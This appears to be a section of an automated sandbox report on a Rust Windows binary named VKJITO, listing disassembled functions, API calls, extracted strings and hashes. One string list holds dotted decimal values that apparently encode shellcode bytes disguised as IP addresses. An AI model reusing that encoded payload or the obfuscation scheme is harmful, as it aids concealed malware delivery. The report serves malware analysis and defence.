                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: CloseCryptCurrentHandleProcessRandom
                                          • String ID:
                                          • API String ID: 837579515-0
                                          • Opcode ID: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                          • Instruction ID: f639273f8c8dcaa8e72c4fafb06c46d7747ad9fe20de3218e7e2afca79db36a9
                                          • Opcode Fuzzy Hash: f1d5dfea6900067569ec1c231c8e48ae001120cc24dc752beeb047049223b3ef
                                          • Instruction Fuzzy Hash: AFF0BE3A648501A2F715AF29D4413ACA291EB02BA4F880070DF9C47AD8CF7CE8E5E320
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: ErrorLast$AddressCaptureContextCurrentDirectoryEntryFunctionLibraryLoadLookupObjectProcSingleWaitmemset
                                          • String ID: EnumerateLoadedModulesW64$SymAddrIncludeInlineTrace$SymFromInlineContextW$SymGetLineFromInlineContextW$SymGetOptions$SymGetSearchPathW$SymInitializeW$SymQueryInlineTrace$SymSetOptions$SymSetSearchPathW$assertion failed: len >= 0$dbghelp.dll$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                          • API String ID: 2237928666-3866678080
                                          • Opcode ID: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                          • Instruction ID: 1969e797b40ca23083930a93a91af21d8a6062896a8958250a9f7589519fd966
                                          • Opcode Fuzzy Hash: 2e0697ca662406930e799439386a56be8149fb00d7aadfcf2c859596d334c49c
                                          • Instruction Fuzzy Hash: E892B53AA09AC2A9FB329F24DC423E973A0FF55788F840175DA4D4BBA4DF399255D310
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressProc$CurrentProcessmemset
                                          • String ID: ($($SymAddrIncludeInlineTrace$SymFromAddrW$SymFromInlineContextW$SymGetLineFromAddrW64$SymGetLineFromInlineContextW$SymQueryInlineTrace$X$X$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                          • API String ID: 3017635649-3223535655
                                          • Opcode ID: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                          • Instruction ID: deb12aadcf2f79acf85ef42c02ae9e9ca7e7614a55fc8c504b0eaad28c9fd18c
                                          • Opcode Fuzzy Hash: 8992c0ac207b2bf095a1048dad7957f7d4498f68d30f6f66bb6674a7cb82d803
                                          • Instruction Fuzzy Hash: 7942D136A08A82A1F7359B14E44A7FAB360FF86B94F804175EA8D03798DF3DD145E760
                                          APIs
                                          • WaitForSingleObjectEx.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBCF8
                                          • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBD11
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBD4A
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBD82
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBDBB
                                          • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBDD4
                                          • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBE12
                                          • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBE6C
                                          • CreateMutexA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBEFE
                                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBF23
                                          • ReleaseMutex.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,?), ref: 00007FF73A5CBF69
                                          • ReleaseMutex.KERNEL32(?,?,?,?,?), ref: 00007FF73A5CC01E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressProc$Mutex$CurrentProcessRelease$CloseCreateHandleLibraryLoadObjectSingleWait
                                          • String ID: SymAddrIncludeInlineTrace$SymGetOptions$SymInitializeW$SymSetOptions$called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs$dbghelp.dll
                                          • API String ID: 2119853198-2283261341
                                          • Opcode ID: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                          • Instruction ID: ebad091e463ee414678372d143bcad9f21cfa9f1b3f92a01a6f92014343b3df6
                                          • Opcode Fuzzy Hash: 4b2c1fc9ce42c7ae5ebe4485f88a3dde7baefa0ee0026cf6fe2f04af51483210
                                          • Instruction Fuzzy Hash: DBA1D02AA09A42A5FB10AF24AC427B4B3A0FF46B54F844174DDAD423E4DF3CE555E330
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: AddressErrorLastWait
                                          • String ID: Box<dyn Any>aborting due to panic at $RUST_BACKTRACEfailed to write the buffered data$full$internal error: entered unreachable code/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\vec\mod.rs$main
                                          • API String ID: 1574541344-3767916208
                                          • Opcode ID: cf9ea439bbed6309da8b0fb5e87ed36c06bd380235b973d50af1b4e1a94eb416
                                          • Instruction ID: 9e31bf829db73adf27dee22a2b2757f589e817ee886448d9bfc642a44f775850
                                          • Opcode Fuzzy Hash: cf9ea439bbed6309da8b0fb5e87ed36c06bd380235b973d50af1b4e1a94eb416
                                          • Instruction Fuzzy Hash: 4672F47AB09B82A5FB61AF14D8423E8B3A0FB16B98F804175DE5D4B790DF38E584D310
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmove
                                          • String ID: 252.72.131.228240.232.200.00.0.65.8165.80.82.8186.72.49.210101.72.139.8296.72.139.8224.72.139.8232.72.139.11480.72.15.18374.74.77.49201.72.49.192172.60.97.1242.44.32.65193.201.13.651.193.226.23782.65.81.72139.82.32.13966.60.72.1208.102.129.1$401$403$Invalid UTF-8 sequence$attempt to calculate the remainder with a divisor of zero$called `Result::unwrap()` on an `Err` value$cryp$cryp$cryp$cryp
                                          • API String ID: 2162964266-1709460868
                                          • Opcode ID: 2178f9af50b5d916e908578593d1f9af5006237e6be56684ae9408c1c753f351
                                          • Instruction ID: ccb961f38e88bd9a072f1171442aeec65ae6d18cabb62eb7e0159587fd941b2c
                                          • Opcode Fuzzy Hash: 2178f9af50b5d916e908578593d1f9af5006237e6be56684ae9408c1c753f351
                                          • Instruction Fuzzy Hash: 1052D37AA09BC2A8FB61AF24D8423E9B760FB45788F804171DA4D47B99DF3CD245D350
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ErrorLast$FullNamePath
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs$\\?\\\?\UNC\
                                          • API String ID: 2482867836-482199288
                                          • Opcode ID: 9128aa4e018cae0e7891eef502d1ee9996ca88ad3b819a35fd94c1d1deafdf2b
                                          • Instruction ID: df130c2f7df5d8130ba1cb49f80dcd6cc2a1bba9c030d2eb31fd78dd51ae5f51
                                          • Opcode Fuzzy Hash: 9128aa4e018cae0e7891eef502d1ee9996ca88ad3b819a35fd94c1d1deafdf2b
                                          • Instruction Fuzzy Hash: 6012E76AA04782A5FB78BF15D4453FDA394FB06B88F808075DE9D47698DF38D681A330
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ErrorHandle$CloseConsoleFileLastModeObjectSingleStatusWaitWrite
                                          • String ID: called `Result::unwrap()` on an `Err` value
                                          • API String ID: 3090192319-2333694755
                                          • Opcode ID: 72f7b5533a2cb62cff9e5685893e1fbc87e345525c20116d02f980b5f783a4a2
                                          • Instruction ID: 391d756a5ed7e96350a0b44b17235536268f8a8506b074f6386772dda837d452
                                          • Opcode Fuzzy Hash: 72f7b5533a2cb62cff9e5685893e1fbc87e345525c20116d02f980b5f783a4a2
                                          • Instruction Fuzzy Hash: 58B1D667A08682A9FB10AF20D8457FCB761FB56398F844279EE5E066D4DF3CD185E320
                                          APIs
                                          Similarity
                                          • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                          • String ID:
                                          • API String ID: 313767242-0
                                          • Opcode ID: 34d6542f7f794a0f6f7474246d8b34ea543ec262e28fd8cfcb632f9fcd746296
                                          • Instruction ID: f322259884db70c2fc817e68a4705468778b4a633a54a3400af27c1f5f1b2900
                                          • Opcode Fuzzy Hash: 34d6542f7f794a0f6f7474246d8b34ea543ec262e28fd8cfcb632f9fcd746296
                                          • Instruction Fuzzy Hash: 23317C77609B819AFB64AF64E8813EAB360FB85744F84407ADB5D47B94DF38C248C720
                                          APIs
                                          Strings
                                          • NTDLL.DLL, xrefs: 00007FF73A5A08F7
                                          • assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs, xrefs: 00007FF73A5A0F46
                                          Similarity
                                          • API ID: FormatHandleMessageModulememmovememset
                                          • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/90b35a6239c3d8bdabc530a6a0816f7ff89a0aaf\library\alloc\src\string.rs
                                          • API String ID: 2025335819-1565840215
                                          • Opcode ID: e07b8a30c25dd0a34cfd926d1bdc520ee7c9484e5b1087614093a708e7ed17c1
                                          • Instruction ID: 7f4dbe66d23b5be01743d190f5e64d075d08c42108d65db354e017b4df976be7
                                          • Opcode Fuzzy Hash: e07b8a30c25dd0a34cfd926d1bdc520ee7c9484e5b1087614093a708e7ed17c1
                                          • Instruction Fuzzy Hash: CBF1B33BA196C2A9F7369F20D8117FDB760F706388F804176DA5D0AAC9DF789285E350
                                          APIs
                                          • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF73A5C957D
                                          • InitializeProcThreadAttributeList.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF73A5C965A
                                          • UpdateProcThreadAttribute.KERNEL32(?,?,?,?,?,?,?,?,00000006,?,00000000,00000000,00000000,?,00000002,?), ref: 00007FF73A5C96BA
                                          Strings
                                          • called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs, xrefs: 00007FF73A5C98EE, 00007FF73A5C9908
                                          Similarity
                                          • API ID: AttributeProcThread$InitializeList$Update
                                          • String ID: called `Option::unwrap()` on a `None` value/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\io\borrowed_buf.rs/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\collections\btree\navigate.rs
                                          • API String ID: 3806694049-556906072
                                          • Opcode ID: 0dfe3c82ccac4f305239c7274cd924dba27e9465a78d90e8cd86c24138786262
                                          • Instruction ID: b6b7c59d16f85d560c2cb36900b3e86196993361a927e46dfbd224428a9068c1
                                          • Opcode Fuzzy Hash: 0dfe3c82ccac4f305239c7274cd924dba27e9465a78d90e8cd86c24138786262
                                          • Instruction Fuzzy Hash: 31A1276AB19A51E1FA14AB6594027F9A3A0BF47BA4F844271DDAD077C8DF3CE141E330
                                          APIs
                                          Strings
                                          • NTDLL.DLL, xrefs: 00007FF73A5C1008
                                          • assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs, xrefs: 00007FF73A5C1334
                                          Similarity
                                          • API ID: ErrorFormatHandleLastMessageModulememset
                                          • String ID: NTDLL.DLL$assertion failed: self.is_char_boundary(new_len)/rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\alloc\src\string.rs
                                          • API String ID: 1434010500-313772267
                                          • Opcode ID: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                          • Instruction ID: a1507abdb07fcf712237ca1a4dacff433d966d98a1b8a9529c66d342d25a1750
                                          • Opcode Fuzzy Hash: 4faf0fd0c90817c6fcaca654bddc8f4c1fb2edc4ab12b504d66ec4c636cb8032
                                          • Instruction Fuzzy Hash: 9AA1C73EA09AC2A4F7319F21D8017F8B7A4FB06384F844175DA8D46B98DF7C9685E320
                                          APIs
                                          Similarity
                                          • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                          • String ID:
                                          • API String ID: 2933794660-0
                                          • Opcode ID: c1499a795a96f987631c70095ea0b3911191cc6322be47dd0d805d40b6ca3f3c
                                          • Instruction ID: 1162f39ac2a49bca3e03f0f5cf0a4ef1818a2716c703d99cdc445f9c84b5b999
                                          • Opcode Fuzzy Hash: c1499a795a96f987631c70095ea0b3911191cc6322be47dd0d805d40b6ca3f3c
                                          • Instruction Fuzzy Hash: BC114C26B55B029AFF009B60E8462A973A4F71A758F840E31EE2D427A4DF38D1A48390
                                          APIs
                                          Similarity
                                          • API ID: ErrorFileObjectReadSingleStatusWait
                                          • String ID:
                                          • API String ID: 3583596364-0
                                          • Opcode ID: 410b11c42a71bbe637eca19ae8600612a85dc4b68e6dc7e78f84d677879cbb33
                                          • Instruction ID: 16245b7317f4d66e50b6a0de8fb85314294d03e8214e0ee3a88ee630fd56756c
                                          • Opcode Fuzzy Hash: 410b11c42a71bbe637eca19ae8600612a85dc4b68e6dc7e78f84d677879cbb33
                                          • Instruction Fuzzy Hash: B0316236A08B8196F7609B24F4513AAF3A5FB85350F908275E6DD42BA8DF7CE0C49B10
                                          Strings
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: .llvm./rust/deps\rustc-demangle-0.1.23\src\lib.rs$__ZN$`fmt::Error`s should be impossible without a `fmt::Formatter`
                                          • API String ID: 1475443563-487299250
                                          • Opcode ID: 06edd6446ae722f7c196e3712d101c936da1beadda079ad2630bf9bc6185b362
                                          • Instruction ID: 54428e96fb398283f4430dcc778288d462ffa3b21930b24352238dfbd870f5eb
                                          • Opcode Fuzzy Hash: 06edd6446ae722f7c196e3712d101c936da1beadda079ad2630bf9bc6185b362
                                          • Instruction Fuzzy Hash: 5242576BE1C692F1F664AA1494163BAFB51AB53354FC042B5DABE06ED0DF3CE540E320
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcmp
                                          • String ID: 00010203040506070809101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899core\src\fmt\mod.rs
                                          • API String ID: 1475443563-2454368799
                                          • Opcode ID: fee08dd55581c5519c83eb913fb2a012764578172f400bbe9b6876b0cc660edb
                                          • Instruction ID: 9286ceba2ffed580af23ca46d117e292b0e03bb8419cf8438dc5190bfbfc9fc9
                                          • Opcode Fuzzy Hash: fee08dd55581c5519c83eb913fb2a012764578172f400bbe9b6876b0cc660edb
                                          • Instruction Fuzzy Hash: BF226826B182A166FB24DF259402FB9A751BB127A4FC05374DE6E4BBC0DF3CE615A310
                                          Strings
                                          Similarity
                                          • API ID: ErrorHandleLast
                                          • String ID: /rustc/eeff92ad32c2627876112ccfe812e19d38494087\library\core\src\slice\iter.rs
                                          • API String ID: 2586478127-1397643090
                                          • Opcode ID: b31b5564bdbfb6f85fbc780bb1f21712b5d4f8444770ada3fd609d084e0f7cf4
                                          • Instruction ID: a6da5665c2ea0320739caaa8e04a98e8e08c3b5070e1e8e753ad31ece2ce25d4
                                          • Opcode Fuzzy Hash: b31b5564bdbfb6f85fbc780bb1f21712b5d4f8444770ada3fd609d084e0f7cf4
                                          • Instruction Fuzzy Hash: 47E1216AB0D782E6FA14AF65A4026B9E390FB46784FC04575EE1E13794DF3CE481E320
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memset
                                          • String ID: punycode{-}0
                                          • API String ID: 2221118986-2450133883
                                          • Opcode ID: 575d84887f0fb015ac62e41ad6e20fbd5207e6328db12b227a6f824d57c5f6bc
                                          • Instruction ID: 24a48001c121aeab6a696665791256c2c5072819e39467277d60f8a3e43d1bc5
                                          • Opcode Fuzzy Hash: 575d84887f0fb015ac62e41ad6e20fbd5207e6328db12b227a6f824d57c5f6bc
                                          • Instruction Fuzzy Hash: A9E1656BB1C64592FB209F15E4023BAB791BB96BC0F848171DE9D03B94EE3CE445E710
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memset
                                          • String ID: punycode{-}0
                                          • API String ID: 2221118986-2450133883
                                          • Opcode ID: ef79e30b4b8cfde21d8624a00a3253746cfe560093d7076683369aa1493a51cb
                                          • Instruction ID: b62556a94df424400c468a57852ec81ef2cbff52339606592b91a1b6c1c509c3
                                          • Opcode Fuzzy Hash: ef79e30b4b8cfde21d8624a00a3253746cfe560093d7076683369aa1493a51cb
                                          • Instruction Fuzzy Hash: 5FE19966F0A68556FB209B25D845BF8A282FB4A7D4F808275CD1D0BFC4EF3CE509A310
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: ,(><&*@$called `Result::unwrap()` on an `Err` value
                                          • API String ID: 0-898078177
                                          • Opcode ID: 684e07fd177a43f29813d91f5496d10b46cd09c7eae714947747212d992e3425
                                          • Instruction ID: c070e781dffca94eded1a94ba23080f110f9f3e1e139e779cab9f8886b9f73ef
                                          • Opcode Fuzzy Hash: 684e07fd177a43f29813d91f5496d10b46cd09c7eae714947747212d992e3425
                                          • Instruction Fuzzy Hash: 5062642AE1C69275FA24AB209406EBCB751AB17B94FC642B9D95D0F3D0DF3DE540E320
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: called `Option::unwrap()` on a `None` value$called `Result::unwrap()` on an `Err` value
                                          • API String ID: 0-1380848348
                                          • Opcode ID: dfe8aececf2d90f8c6956533a32bf12b5974a29f2e7fbad940f0f630b4e2571b
                                          • Instruction ID: 7d09195481be0d0ffeaf90329b3c2609125cc0571bd9493c70596652ebd449e1
                                          • Opcode Fuzzy Hash: dfe8aececf2d90f8c6956533a32bf12b5974a29f2e7fbad940f0f630b4e2571b
                                          • Instruction Fuzzy Hash: E352785BE1C69275FA64AA10A4077B9F7A1AB23781FC441B1DABD067D5CF3CE540B320
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memmovememset
                                          • String ID:
                                          • API String ID: 1288253900-0
                                          • Opcode ID: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                          • Instruction ID: fe80c9ed38205dc0fed22375527bc6061d34430bd39a6adca8643bc5c651154a
                                          • Opcode Fuzzy Hash: 66dabcd47092da837a605f4a481dfcd21eba1e379244336c7acd503d749ff5d8
                                          • Instruction Fuzzy Hash: 75028566D28FD941E223973968067FBAB10AFF7748F51E31BFEC931E15DB18A2419210
                                          APIs
                                          • memset.VCRUNTIME140(?,?,?,?,00000000,?,?,-00000008,?,00000000,00007FF73A5AD020), ref: 00007FF73A5DD898
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID:
                                          • API String ID: 2221118986-0
                                          • Opcode ID: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                          • Instruction ID: 94c68d61c725b6d2671f15728b12c6b4e0db72df5c4bbcf9ac28ba0dcb15c90d
                                          • Opcode Fuzzy Hash: 776f5ae8c80b3e66ed5c2f7054bfa38d53dc4fa2bcb914b6d684b29f270d49ae
                                          • Instruction Fuzzy Hash: 01F14557A0E6E195EA029B2D4002179BF60EB537A4F59C3B1DFB8177C2DA3DD146E320
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 33333333$UUUUUUUU
                                          • API String ID: 0-3483174168
                                          • Opcode ID: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                          • Instruction ID: 9f65aa689f48d9da1cb3338e6f3165f74d93f4c1ad144cb72cf1e876bc014956
                                          • Opcode Fuzzy Hash: c58ef647f76863410c87604685f555bae2d83ddaacc038b804bf6de1dc359f8d
                                          • Instruction Fuzzy Hash: 2F91C783B581F003F7624B7D2D6656AEFA25406BD370DF452EED427A86C038CC2AE365
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 33333333$UUUUUUUU
                                          • API String ID: 0-3483174168
                                          • Opcode ID: 394c0e031d85012aa99c547211958ac55519fdc23ec767107c687ad2c3f41526
                                          • Instruction ID: ea4d446fc81061f085101c1a00567688634e4e3d448364d1291719dfb932fb5e
                                          • Opcode Fuzzy Hash: 394c0e031d85012aa99c547211958ac55519fdc23ec767107c687ad2c3f41526
                                          • Instruction Fuzzy Hash: 5291728331A7D48FAB52C7BE1C44D8A5ED1906AFC836CF06DDE882B722D026D553D362
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2082420265.00007FF73A591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73A590000, based on PE: true
                                          • Associated: 00000000.00000002.2082399318.00007FF73A590000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082458680.00007FF73A5DE000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082485588.00007FF73A5F8000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2082505505.00007FF73A5F9000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_7ff73a590000_VKJITO.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7a57c6d56c9da48ac59047e24bc76c30fded5785c54a955f60598b6f1a215bd
                                          • Instruction ID: 52649213f2d2609931895726c63d098af9524432a3ccab9f5988b0dc663424b8
                                          • Opcode Fuzzy Hash: b7a57c6d56c9da48ac59047e24bc76c30fded5785c54a955f60598b6f1a215bd
                                          • Instruction Fuzzy Hash: 9132B23AA49BC5A8FB719F65D806BF963A1FB16748F840179CE4D0B795DF389280D310
                                          APIs
                                          Memory Dump Source
